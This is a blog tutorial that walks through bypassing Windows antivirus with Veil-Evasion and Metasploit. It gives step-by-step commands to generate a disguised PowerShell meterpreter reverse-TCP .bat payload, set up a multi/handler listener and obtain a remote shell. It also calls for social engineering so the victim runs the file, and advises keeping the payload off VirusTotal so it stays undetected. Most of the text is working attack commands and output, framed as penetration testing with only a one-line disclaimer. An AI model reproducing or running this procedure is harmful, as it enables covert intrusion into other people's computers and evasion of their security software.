How To Bypass Anti-Virus In Windows Using Veil & Metasploit On Kali

by Sunny Hoi

Introduction

In this tutorial, I will be showing how to bypass Anti-Virus (AV) software on Windows machines easily using the Veil Evasion tool and Metasploit Framework.

Social engineering is needed to get the adversary to execute the PowerShell based bat file on their Windows 10 machine.

Of course, an exe file can be generated. But we’ll focus on the deployment of a bat file to keep this tutorial relatively short and simple.

Hence, I will be illustrating how to install Veil quickly, use Veil-Evasion to deploy a PowerShell-based payload, and show how to make a remote handler using Metasploit.

The process of using the Veil Evasion tool and Metasploit is ultimately conveyed.

What Does Veil Allow A Penetration Tester To Do?

Veil permits the penetration tester to employ a remote shell which holds the ability to bypass the majority of Anti-Virus software available commercially.


Note: This is a penetration testing tutorial. You are responsible for your own actions.


1. To get Veil working on Kali, we have to first install Veil.

Type the following command into the terminal:

apt -y install veil

If you prefer the regular mode with all the installation windows for various dependencies and more customization options, enter y instead.

Prefer to install it on silent mode? Continue the installation by entering s when asked: “Are you sure you wish to install Veil?”

You can also activate silent mode and force mode using: /usr/share/veil/config/setup.sh –force -silent

Using Veil In Kali Linux

Open up a terminal in Kali and enter in: veil

Veil has two tools available.

1. Enable Veil-Evasion

This tutorial will use Veil-Evasion. Therefore, enter in: 1

2. Check Available Payloads

To see the available payloads for pentesting, enter in: list

3. Use rev_tcp.py

Let’s go ahead and employ ‘powershell/meterpreter/rev_tcp.py‘ by entering in: use 22

4. Change Your LHOST Variable & Confirm That The LHOST Variable Has Changed

For this payload to work, you have to alter your LHOST variable to your Kali machine’s IP address.

If you are unsure what your Kali IP is, go to the terminal and enter in: ifconfig

For demonstration purposes, we’ll set the LHOST to ‘192.168.0.16‘ by entering: ‘set LHOST 192.168.0.16

To confirm that you have successfully changed the LHOST variable, enter: options

5. Keep Default Port 4444

Do not change the port ‘4444‘.

6. Generating The Payload & Assign A Name For The New File

Enter in: generate

Name your new file. I named my ‘HelloFriend

Enter to continue.

7. Shell File Created

The shell file called HelloFriend.bat is placed in ‘/var/lib/veil/output/source/

When an adversary has clicked on this bat file on a Windows machine, the file will attempt to connect to the pentester’s Kali system.

To view the source code, go to the aforementioned directory and examine the file.

8. Run The Multi/Handler On Kali Using Metasploit Framework

Obviously, you have to enable the Metasploit handler to accept connectivity prior to the bat file attempting to connect to your Kali machine.

Prior to running the multi/handler, setting it up is required.

Open Metasploit Framework from the Kali Desktop.

Enter: use multi/handler

Set and alter the subsequent settings accordingly:

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.0.16

set LPORT 4444

exploit


9. Confirm That The Reverse TCP Handler Is Running

If the multi/handler is running on the Kali machine, you should see a message similar to this:

[*] Started reverse TCP handler on 192.168.0.16:4444


As you can see, the Metasploit handler is running and continues waiting until the bat file is opened by the adversary on their Windows system.

10. Confirm That The Created Bat File Has Been Successfully Executed On The Target Machine

If the adversary opens the file and it successfully executes on the machine, a remote shell will be established among the adversary’s Windows machine and the penetration tester’s Kali system.

The messages would be similar to this on your Kali machine:

[*] Started reverse TCP handler on 192.168.0.16:4444

[*] Sending stage (133337 bytes) to 192.168.0.28

[*] Meterpreter session 1 opened (192.168.0.28:4444 -> 192.168.0.16:50123) 18-12-03 10:13:08 -0400


Adjustments May Be Needed Due To Advancements In Anti-Virus Detection

Since Anti-Virus engines are sophisticated nowadays at detecting Power-Shell based malware, it is necessary to check out alternative options available in Veil for evasive and learning purposes.

Thus, this penetration testing guide serves as a starting point for IT security enthusiasts and professionals.

Also, remember not to submit your files created by these penetration testing tools to VirusTotal. This is obvious but just a reminder. Sometimes people forget.

Check For A Reverse Shell

Check if you have a reverse shell by entering into the terminal: shell

If successful, you see messages similar to the following:

meterpreter > shell

Process 1337 created.

Channel 1 created.

Microsoft Windows

C:\Users\Sunny\Desktop>


Conclusion

Veil and Metasploit serve as significant tools in the armory of an IT security professional.

Cyber threat actors ought to always be examining for security vulnerabilities and developing clever tactics in bypassing AV solutions. Patience is just as necessary as learning.

Related Posts